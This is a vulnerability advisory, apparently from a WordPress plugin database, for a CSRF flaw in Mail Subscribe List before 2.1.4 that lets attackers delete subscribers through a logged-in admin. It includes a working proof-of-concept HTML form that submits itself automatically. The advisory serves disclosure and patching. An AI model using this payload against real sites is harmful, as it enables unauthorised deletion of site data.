WordPress Plugin Vulnerabilities
Mail Subscribe List < 2.1.4 - Arbitrary Subscribed User Deletion via CSRF
Description
The plugin does not have CSRF check in place when deleting subscribed users, which could allow attackers to make a logged in admin perform such action and delete arbitrary users from the subscribed list
Proof of Concept
<form id="test" action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST">
<input type="text" name="sml_remove" value="1">
<input type="text" name="rem[]" value="1">
<input type="text" name="rem[]" value="4">
</form>
<script>
document.getElementById("test").submit();
</script> Affects Plugins
Fixed in version 2.1.4
References
Classification
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-05-26 (about 1 years ago)
Added
2022-05-26 (about 1 years ago)
Last Updated
2023-02-22 (about 3 months ago)